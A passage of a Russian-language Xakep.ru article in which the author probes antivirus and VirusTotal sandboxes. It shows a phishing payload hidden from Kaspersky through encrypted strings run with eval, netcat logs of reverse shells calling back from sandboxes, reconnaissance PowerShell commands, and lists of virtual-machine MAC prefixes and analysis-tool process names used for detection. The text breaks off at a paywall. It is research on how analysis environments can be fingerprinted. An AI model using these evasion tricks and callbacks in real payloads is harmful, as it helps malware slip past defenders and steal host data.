Как устро­ены анти­вирус­ные песоч­ницы, извес­тно лишь понас­лышке: вен­доры надеж­но хра­нят свои сек­реты. Что мы уви­дим, если попыта­емся заг­лянуть к ним под капот? В этой статье — резуль­таты экспе­римен­та по иссле­дова­нию сред ана­лиза вре­донос­ного ПО, вклю­чая VirusTotal. Мы написа­ли скрипт для обхо­да песоч­ниц и получи­ли reverse shell: теперь мы точ­но зна­ем, что там внут­ри.

Од­нажды мы решили про­вес­ти тес­товую фишин­говую ата­ку в нашей орга­низа­ции, что­бы под­нять уро­вень осве­дом­леннос­ти сот­рудни­ков. В роли нас­тояще­го «хакера» я решил пос­тро­ить всю инфраструк­туру сам. Зарегал под­дель­ный домен, под­нял свой поч­товый сер­вер, сер­вер для при­ема отсту­ка. И тут приш­ло вре­мя писать кли­ент­скую часть, а имен­но ту полез­ную наг­рузку, которая будет отправ­лять­ся поль­зовате­лю.

Для получе­ния исполня­емо­го фай­ла я исполь­зовал связ­ку Python + PyInstaller. Идея сос­тояла в том, что­бы соб­рать минимум информа­ции о хос­те и понять, кому из сот­рудни­ков он при­над­лежит. Основной информа­цией стал IP-адрес машины в локаль­ной сети пред­при­ятия, пос­коль­ку он никог­да не меня­ется и по нему мож­но выяс­нить, кто же все‑таки запус­тил «вре­донос».

warning

Статья написа­на в иссле­дова­тель­ских целях, име­ет озна­коми­тель­ный харак­тер и пред­назна­чена для спе­циалис­тов по безопас­ности. Автор и редак­ция не несут ответс­твен­ности за любой вред, при­чинен­ный с при­мене­нием изло­жен­ной информа­ции. Исполь­зование или рас­простра­нение ПО без лицен­зии про­изво­дите­ля может прес­ледовать­ся по закону.

При­мер информа­ции, которая пос­тупала на мой сер­вер, если кто‑то запус­кал исполня­емый файл:

Hostname: <hostname>
Version: <version_os>
Release: <number_release>
Architecture: <architecture>
Type machine: <type>
Network name: <network_name>
User: <run_user>
OS type: <windows/linux>
Local_ip: <local_ip>

На машинах орга­низа­ции, которую мы тес­тирова­ли, сто­ит анти­вирус­ное решение от ком­пании Kaspersky — Kaspersky Endpoint Security. Для его обхо­да я исполь­зовал воз­можность Python выпол­нять код, который переда­ется в виде стро­ки. При­веду при­мер.

Вот исходный код на Python для получе­ния OS type:

os_type = platform.system()

А так выг­лядит обфусци­рован­ный код:

command_crypt = b'k\xb0\x0fp4\x03\xe9D\xe0\x01\xd5Z}\xc1\x85\xa42\xc56\x9f\xc0\x81\xaf\t\xe5\x08k!\x81\xd5\xcc\xf0'
command_decrypt = func_decrypt(command_crypt, key_decrypt)
os_type = eval(command_decrypt)

Ре­али­зация нес­ложная. Сна­чала мы шиф­руем все стро­ки кода с исполь­зовани­ем фун­кции шиф­рования, затем исполь­зуем их в ито­говом фай­ле, из которо­го будет получен исполня­емый файл. В нем содер­жится код с такой струк­турой:

  1. За­шиф­рован­ная стро­ка кода.
  2. Де­шиф­ровка зашиф­рован­ной стро­ки кода.
  3. Ее выпол­нение.

По­лучен­ный исполня­емый файл я помес­тил на сер­вер. В зависи­мос­ти от передан­ного в зап­росе User-Agent скрипт переда­вал­ся под нуж­ную ОС. Ког­да поль­зователь перехо­дил по фишин­говой ссыл­ке, ему отправ­лялся архив, замас­кирован­ный под файл .xls, пос­ле чего выпол­нялся редирект на реаль­ный сайт ком­пании, что­бы было менее подоз­ритель­но.

Так вот, еще до того, как я выг­рузил файл на сер­вер, я уже начал получать отсту­ки от непонят­ных для меня хос­тов. Вот при­мер одно­го из таких:

Hostname: DESKTOP-HESL6H8
Version: 10.0.18362
Release: 10
Architecture: ('64bit', 'WindowsPE')
Type machine: AMD64
Network name: DESKTOP-HESL6H8
User: G58gQ
OS type: Windows
Local_ip: 10.16.202.175

Сра­зу бро­сает­ся в гла­за стран­ное имя поль­зовате­ля, как буд­то бы сге­нери­рован­ное. Единс­твен­ная «утеч­ка» мог­ла про­изой­ти с машины, на которой я тес­тировал обход анти­виру­са Kaspersky. Тог­да я не стал обра­щать вни­мания на это, пос­коль­ку анти­вирус все рав­но не ругал­ся на мой файл. И я бла­гопо­луч­но забил на этот факт до недав­него вре­мени, пока не заин­тересо­вал­ся обхо­дом песоч­ниц.

 

Идея по сбору информации о песочницах

Пред­положи­тель­но тог­да я получал отсту­ки из песоч­ниц Kaspersky, которые ана­лизи­рова­ли файл с неиз­вес­тной сиг­натурой. Поэто­му я решил: раз при­ходят зап­росы, зна­чит, у песоч­ниц есть дос­туп в интернет и он не бло­киру­ется. Если усо­вер­шенс­тво­вать скрипт с reverse shell, что­бы не ловить­ся прос­то по сиг­натуре, мож­но поп­робовать полазить по такой песоч­нице. Осно­ву для реали­зации этой идеи я взял с сай­та revshells.com.

Для экспе­римен­тов исполь­зовалась машина с белым IP. Я ском­пилиро­вал файл, и анти­вирус пос­ле пары под­клю­чений его ней­тра­лизо­вал. А я стал ждать. И... ничего, я так и не получил кон­некта.

Но при заг­рузке прог­раммы на VirusTotal вир­туаль­ные сре­ды все‑таки поз­воля­ют вза­имо­дей­ство­вать с хос­том пос­ле под­клю­чения:

root@hostname:~# nc -lvnp 8080
Listening on 0.0.0.0 8080

Connection received on 34.86.36.138 49171
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.

PS C:\Users\azure\Downloads>
PS C:\Users\azure\Downloads> dir
dir
PS C:\Users\azure\Downloads> cd ..
cd ..
PS C:\Users\azure> dir
dir

Directory: C:\Users\azure

Mode LastWriteTime Length Name

d----- 3/31/2022 5:04 AM .idlerc
d----- 1/6/2023 10:44 AM .ms-ad
d-r--- 3/25/2022 4:09 PM Contacts
d-r--- 3/25/2022 6:25 PM Desktop
d-r--- 3/25/2022 4:09 PM Documents
d-r--- 5/5/2025 8:45 AM Downloads
d-r--- 3/25/2022 4:09 PM Favorites
d-r--- 3/25/2022 4:09 PM Links
d-r--- 3/25/2022 4:09 PM Music
d-r--- 3/25/2022 4:09 PM Pictures
d-r--- 3/25/2022 4:09 PM Saved Games
d-r--- 3/25/2022 4:09 PM Searches
d-r--- 3/25/2022 4:09 PM Videos

PS C:\Users\azure> Get-Process
Get-Process

Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
------- ------ ----- ----- ------ -- -- -----------
115 9 15448 15812 0.64 932 0 audiodg
31 5 1080 3348 0.02 2168 1 conhost
35 5 1140 3748 0.02 2444 1 conhost
31 5 1080 3344 0.00 2460 1 conhost
31 5 1076 3348 0.03 2560 1 conhost
31 5 1076 3344 0.02 2648 1 conhost
31 5 1076 3344 0.00 2668 1 conhost
31 5 1080 3312 0.02 2788 1 conhost
31 5 1080 3316 0.00 2812 1 conhost
434 11 1840 4080 0.86 328 0 csrss
325 15 2876 5900 1.19 384 1 csrss

...

79 7 1416 5280 0.06 2056 0 unsecapp
81 10 1460 4728 0.64 376 0 wininit
112 9 2692 7520 1.77 424 1 winlogon
182 11 3532 9852 0.13 584 0 WmiPrvSE
124 9 2280 6820 0.05 1836 0 WmiPrvSE
133 9 2464 7236 0.14 2744 0 WmiPrvSE
439 32 9896 27188 0.83 2484 0 wmpnetwk

PS C:\Users\azure> exit

root@hostname:~# nc -lvnp 8080
Listening on 0.0.0.0 8080
Connection received on 34.45.100.89 49681
ls
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Users\Bruno\Desktop> ls

Directory: C:\Users\Bruno\Desktop

Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/5/2025 2:59 PM EEGWXUHVUG
d----- 3/5/2025 2:59 PM EFOYFBOLXA
d----- 3/5/2025 2:59 PM EOWRVPQCCS
d----- 3/5/2025 2:59 PM EWZCVGNOWT

`...

-a---- 3/5/2025 2:59 PM 1026 PWCCAWLGRE.pdf
-a---- 3/5/2025 2:59 PM 1026 QCFWYSKMHA.jpg
-a---- 5/6/2025 12:56 AM 49495 reverse.exe
-a---- 3/5/2025 2:59 PM 1026 SFPUSAFIOL.xlsx
-a---- 3/5/2025 2:59 PM 1026 SUAVTZKNFL.png

PS C:\Users\Bruno\Desktop> exit

В ито­ге я решил исполь­зовать так­тику, как при про­веде­нии фишин­говой ата­ки, а имен­но — исполь­зовать скрипт для сбо­ра информа­ции о сис­теме и отправ­ки дан­ных на сер­вер.

По­нят­но, что тех дан­ных, которые я собирал в изна­чаль­ном скрип­те, явно малова­то, поэто­му я усо­вер­шенс­тво­вал прог­рамму, и теперь она собира­ет сле­дующие парамет­ры:

OS type:
Version:
Release:
Architecture:
Type machine:
Network name:
User:
Hostname:
Local ip:
System Date:
System boot time:
Uptime:
System hardware:
System File:
Directory: C:/Windows:
Directory: C:/Program Files:
Directory: C:/Program Files (x86):
Directory: C:/ProgramData:
Directory: C:/Windows/System32:
Directory: C:/Windows/SysWOW64:
Directory: C:/Windows/Temp:
Directory: C:/Users:
User File:
User directory:
Directory: Downloads:
Directory: Desktop:
Directory: Pictures:
Directory: Videos:
Directory: Music:
Directory: AppData\Local\Temp:
Process Data:

Так­же я собирал информа­цию о сис­теме c помощью команд PowerShell, исполь­зуя модуль subprocess:

systeminfo
ipconfig /all
net user
Get-WmiObject Win32_ComputerSystem
Get-Service
Get-WmiObject Win32_VideoController
Get-CimInstance Win32_LogicalDisk -Filter "DriveType=3" | Select-Object `DeviceID, @{Name="Size(GB)";Expression={"{0:N2}" -f ($_.Size / 1GB)}}, @{Name="Free(GB)";Expression={"{0:N2}" -f ($_.FreeSpace / 1GB)}},@{Name="Used(GB)";Expression={"{0:N2}" -f (($_.Size - $_.FreeSpace) / 1GB)}}

www

По­ка скрип­ты кру­тились в дро­бил­ках песоч­ниц, я поис­кал в интерне­те информа­цию об обхо­де этих самых песоч­ниц. В ито­ге мне пон­равились эти статьи:

Мно­гие идеи я буду брать из этих ста­тей, так что мой код по боль­шей час­ти не уни­кален.

 

Анализ полученной информации

Ни­же при­веде­на таб­лица с дан­ными, по которой мы будем в пер­вую оче­редь опре­делять сре­ду.

Environment Hostname OS Version CPU count Total memory Uptime (day hh.mm.ss) Process count
Real PC 10 4 32 1 day 02:16:12 192
Real PC 10 6 16 13:51:48 275
VirTotal WIN-5E07COS9ALR 10 1 1 0:01:04 56
VirTotal WIN-QIUREVVK5FL 7 1 8 0:01:41 60
VirTotal 715575 10 4 8 2:06:38 189
VirTotal 061544 10 2 8 2:03:42 161
VirTotal 424505 10 4 8 1:46:43 167
VirTotal azure-PC 7 2 2 0:03:57 58
VirTotal azure-PC 7 2 2 0:04:11 55
VirTotal WALKER-PC 7 2 1.5 0:01:25 54
VirTotal 00900BC83803 10 2 2 0:50:12 52
VirTotal COMPUTER-9GV0UZ 10 2 4 0:08:47 103
VirTotal MZLTRR848050884 10 1 2 2:41:42 51

Бро­сает­ся в гла­за, что у некото­рых хос­тов явно проб­лемы с CPU и MEM. Так­же мы видим, что некото­рые машины край­не недол­го находят­ся в Uptime, а у дру­гих слиш­ком мало запущен­ных про­цес­сов. Все это кос­венно может сви­детель­ство­вать о вир­туали­зации. Дан­ных от песоч­ниц Kaspersky я не получил: анти­вирус ни в какую не хотел счи­тать мой файл злов­редным.

В ито­ге я решил про­верить свою прог­рамму с помощью динами­чес­кого ана­лиза на их сай­те opentip.kaspersky.com. И как ока­залось, исполня­емый файл, получен­ный с исполь­зовани­ем связ­ки Python 3.12 + PyInstaller, прос­то не может запус­тить­ся в их песоч­нице.

И даже с уче­том того, что файл содер­жит reverse shell, ана­лиз показы­вает, что файл безопа­сен.

В общем, я вер­нулся на Python 3.7 и поп­робовал писать код на нем. Теперь прог­рамма ана­лизи­рова­лась нор­маль­но. Вот дан­ные, которые я получил.

Environment Hostname OS Version CPU count Total memory Uptime (day hh.mm.ss) Process count
Real PC 10 4 32 1 day 02:16:12 192
Real PC 10 6 16 13:51:48 275
Kas ELZ-8K4JW2UL3QY 10 2 4 0:08:16 100
Kas art-PC 7 2 1 0:04:15 44

Но получить с хос­тов дан­ные, похожие на те, что при­ходи­ли при про­веде­нии тес­товой фишин­говой ата­ки, мне не уда­лось. И толь­ко ког­да я оста­вил одни коман­ды PowerShell, мне наконец при­лете­ли отсту­кива­ния, которые были схо­жи, по край­ней мере hostname и username напоми­нали те, что я уви­дел в пер­вый раз. К сожале­нию, коман­да Get-Process почему‑то не отра­бота­ла, и информа­ции о количес­тве запущен­ных про­цес­сов мне получить не уда­лось.

Host Hostname OS Version CPU count Total memory Uptime (day hh.mm.ss) Process count
Real PC 4 32 1 day 02:16:12 192
Real PC 6 16 13:51:48 275
Kas DESKTOP-09L7V90 10 1 2 1:35:42 ?
Kas DESKTOP-NL2CM8W 10 1 2 2:38:52 ?
Kas DESKTOP-WSP0LAK 10 1 2 3:44:45 ?

Как вид­но, эти хос­ты тоже стра­дают от нех­ватки CPU и MEM.

Те­перь копа­ем глуб­же: нам нуж­ны MAC-адре­са. По ним так­же мож­но понять, что прог­рамма запуще­на в вир­туаль­ной сре­де. На этом ловят­ся хос­ты WIN-\*. Вот MAC-адре­са, которые будем искать:

{{0x00, 0x50, 0x56}, "VMware ESX 3, Server, Workstation, Player"},
{{0x00, 0x0C, 0x29}, "VMware ESX 3, Server, Workstation, Player"},
{{0x00, 0x05, 0x69}, "VMware ESX 3, Server, Workstation, Player"},
{{0x00, 0x1с, 0x14}, "VMware ESX 3, Server, Workstation, Player"},
{{0x00, 0x03, 0xff}, "Microsoft Hyper-V, Virtual Server, Virtual PC"},
{{0x00, 0x0d, 0x3a}, "Microsoft Hyper-V, Virtual Server, Virtual PC"},
{{0x00, 0x50, 0xf2}, "Microsoft Hyper-V, Virtual Server, Virtual PC"},
{{0x7c, 0x1e, 0x52}, "Microsoft Hyper-V, Virtual Server, Virtual PC"},
{{0x00, 0x12, 0x5a}, "Microsoft Hyper-V, Virtual Server, Virtual PC"},
{{0x00, 0x15, 0x5d}, "Microsoft Hyper-V, Virtual Server, Virtual PC"},
{{0x00, 0x17, 0xfa}, "Microsoft Hyper-V, Virtual Server, Virtual PC"},
{{0x28, 0x18, 0x78}, "Microsoft Hyper-V, Virtual Server, Virtual PC"},
{{0x7c, 0xed, 0x8d}, "Microsoft Hyper-V, Virtual Server, Virtual PC"},
{{0x00, 0x1d, 0xd8}, "Microsoft Hyper-V, Virtual Server, Virtual PC"},
{{0x00, 0x22, 0x48}, "Microsoft Hyper-V, Virtual Server, Virtual PC"},
{{0x00, 0x25, 0xae}, "Microsoft Hyper-V, Virtual Server, Virtual PC"},
{{0x60, 0x45, 0xbd}, "Microsoft Hyper-V, Virtual Server, Virtual PC"},
{{0xdc, 0xb4, 0xc4}, "Microsoft Hyper-V, Virtual Server, Virtual PC"},
{{0x00, 0x1c, 0x42}, "Parallels Desktop, Workstation, Server, Virtuozzo"},
{{0x00, 0x0f, 0x4b}, "Virtual Iron 4"},
{{0x00, 0x16, 0x3e}, "Red Hat Xen | Oracle VM | XenSource | Novell Xen"},
{{0x08, 0x00, 0x27}, "Sun xVM VirtualBox"},

А вот про­цес­сы, по которым мож­но понять, что скрипт запущен в вир­туаль­ной сре­де или ана­лизи­рует­ся в дебаг­гере:

// Иконка VirtualBox в трее гостевой ОС
TEXT("VBoxTray.exe"),
// Служба VirtualBox Guest Additions
TEXT("VBoxService.exe"),
TEXT("vboxservice.exe"),
// Драйвер VirtualBox Guest
TEXT("vboxguest.sys"),
// VMware Tools
TEXT("vmtoolsd.exe"),
TEXT("vmwaretray.exe"),
TEXT("vmwareuser.exe"),
TEXT("vmsrvc.exe"),
TEXT("vmhgfs.sys"),
TEXT("vmware-vmx.exe"),
TEXT("vmware-authd.exe"),
// Hyper-V
TEXT("vmicvss.exe"),
// TEXT("vmms.exe"), // Был обнаружен в реальной машине, закомментировано
TEXT("vmmem.exe"),
TEXT("vmwp.exe"),
// QEMU
TEXT("qemu-system-x86_64.exe"),
TEXT("qemu-vm-guest.exe"),
// Parallels
TEXT("prl_vm_app.exe"),
TEXT("prl_tools.exe"),
TEXT("prl_cc.exe"),
TEXT("SharedIntApp.exe"),
// Драйвер мыши виртуальной машины
TEXT("vmmouse.sys"),
// Xen Virtualization environment
TEXT("xenservice.exe"),
// Windows Sandbox
TEXT("WindowsSandbox.exe"),
// Sandboxie
TEXT("SandboxieRpcSs.exe"),
TEXT("SandboxieDcomLaunch.exe"),
TEXT("SbieSvc.exe"),
TEXT("SbieCtrl.exe"),
// Comodo Sandbox
TEXT("SxIn.exe"),
// Process Monitor анализ поведения
TEXT("procmon.exe"),
// Обнаружен в процессах одной из песочниц VirusTotal
TEXT("VmRemoteGuest.exe"),
// Windows Debugging Tools
TEXT("ntsd.exe"),
TEXT("windbg.exe"),
// IDA Pro
TEXT("idaq.exe"),
TEXT("idag.exe"),
// x64dbg/x32dbg
TEXT("x64dbg.exe"),
TEXT("x32dbg.exe"),

И тут меня заин­тересо­вал вывод коман­ды

Get-WmiObject Win32_VideoController

А имен­но вот такие стро­ки:

Name
Description
PNPDeviceID

Со­бираю информа­цию с хос­тов:

Real PC:
Description : AMD Radeon(TM) Vega 10 Graphics
PNPDeviceID : PCI\VEN_1002&DEV_15DD&SUBSYS_512217AA&REV_D0\4&35FEB52A&0&0041
Description : Intel(R) UHD Graphics 730
PNPDeviceID : PCI\VEN_8086&DEV_4692&SUBSYS_D0001458&REV_0C\3&11583659&0&10
Kaspersky:
С сайта анализатора:
Hostname: ELZ-8K4JW2UL3QY
OS: Windows 10
Name : Microsoft Basic Display Adapter
Description : Microsoft Basic Display Adapter
PNPDeviceID : PCI\VEN_1AE0&DEV_A001&SUBSYS_00011AE0&REV_01\3&13C0B0C5&0&18
Hostname: art-PC
OS: Windows 7
Name : Standard VGA Graphics Adapter
Description : Standard VGA Graphics Adapter
PNPDeviceID : PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_02\3&1
Файлы, аналогичные файлам при проведении тестового фишинга:
Hostname: DESKTOP-09L7V90
OS: Windows 10
Name : Microsoft Basic Display Adapter
Description : Microsoft Basic Display Adapter
PNPDeviceID : PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_00\3&13C0B0C5&0&10
Hostname: DESKTOP-NL2CM8W
OS: Windows 10
Name : Microsoft Basic Display Adapter
Description : Microsoft Basic Display Adapter
PNPDeviceID : PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_00\3&13C0B0C5&0&10
Hostname: DESKTOP-WSP0LAK
OS: Windows 10
Name : Microsoft Basic Display Adapter
Description : Microsoft Basic Display Adapter
PNPDeviceID : PCI\VEN_1234&DEV_1111&SUBSYS_11001AF4&REV_00\3&13C0B0C5&0&10
VirusTotal:
Hostname: WIN-5E07COS9ALR
OS: Windows 10
Name : Microsoft Hyper-V Video
Description : Microsoft Hyper-V Video
PNPDeviceID : VMBUS\{DA0A7802-E377-4AAC-8E77-0558EB1073F8}\{5620E0C7-8062-4DCE-AEB7-520C7EF76171}
Hostname: WIN-QIUREVVK5FL
OS: Windows 7
Name : Microsoft Hyper-V Video
Caption : Microsoft Hyper-V Video
PNPDeviceID : VMBUS\{DA0A7802-E377-4AAC-8E77-0558EB1073F8}\{5620E0C7-8062-4DCE-AEB7-520C7EF76171}
Hostname: 715575
OS: Windows 10
Name : AD59MKMM
Description : CMPMV5
PNPDeviceID : PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78
Hostname: 061544
OS: Windows 10
Данные отсутствуют (команда не выполнилась)
Hostname: 424505
OS: Windows 10
Name : X9387726
Description : AE27H7US
NPDeviceID : PCI\VEN_15AD&DEV_0405&SUBSYS_040515AD&REV_00\3&61AAA01&0&78
Hostname: azure-PC
OS: Windows 7
Name : Standard VGA Graphics Adapter
Description : Standard VGA Graphics Adapter
PNPDeviceID : PCI\VEN_1B36&DEV_0100&SUBSYS_11001AF4&REV_05\3&2
Hostname: azure-PC
OS: Windows 7
Name : Standard VGA Graphics Adapter
Description : Standard VGA Graphics Adapter
PNPDeviceID : PCI\VEN_1B36&DEV_0100&SUBSYS_11001AF4&REV_05\3&2
Hostname: 00900BC83803
OS: Windows 10
Name : Intel(R) UHD Graphics 630
Description : Microsoft Basic Display Adapter
PNPDeviceID : PCI\VEN_1234&DEV_5678&SUBSYS_9101112&REV_01\3&ABCDE&0&11
Hostname: COMPUTER-9GV0UZ
OS: Windows 10
Name : Microsoft Basic Display Adapter
Description : Microsoft Basic Display Adapter
PNPDeviceID : PCI\VEN_1AE0&DEV_A001&SUBSYS_00011AE0&REV_01\3&13C0B0C5&0&18
Hostname: MZLTRR848050884
OS: Windows 10
Name : Microsoft Basic Display Adapter
Description : Microsoft Basic Display Adapter
PNPDeviceID : PCI\VEN_8086&DEV_0412&SUBSYS_2AF7103C&REV_06\3&21436425&0&10

Как вид­но, есть пов­торя­ющиеся зна­чения, а так­же име­на и опи­сания, похожие на дефол­тные или сге­нери­рован­ные. Допол­нитель­но к выводу о том, что при про­веде­нии тес­тирова­ния по фишин­гу мне при­лета­ли отсту­ки от Kaspersky, говорят оди­нако­вые VEN и DEV, получен­ные с сай­та ана­лиза­тора и отку­да‑то еще (отку­да при­лета­ют стран­ные отсту­кива­ния со стран­ных хос­тов, я так и не понял).

Продолжение доступно только участникам

Материалы из последних выпусков становятся доступны по отдельности только через два месяца после публикации. Чтобы продолжить чтение, необходимо стать участником сообщества «Xakep.ru».

Присоединяйся к сообществу «Xakep.ru»!

Членство в сообществе в течение указанного срока откроет тебе доступ ко ВСЕМ материалам «Хакера», позволит скачивать выпуски в PDF, отключит рекламу на сайте и увеличит личную накопительную скидку! Подробнее

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

    • Открыть комментарии
    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии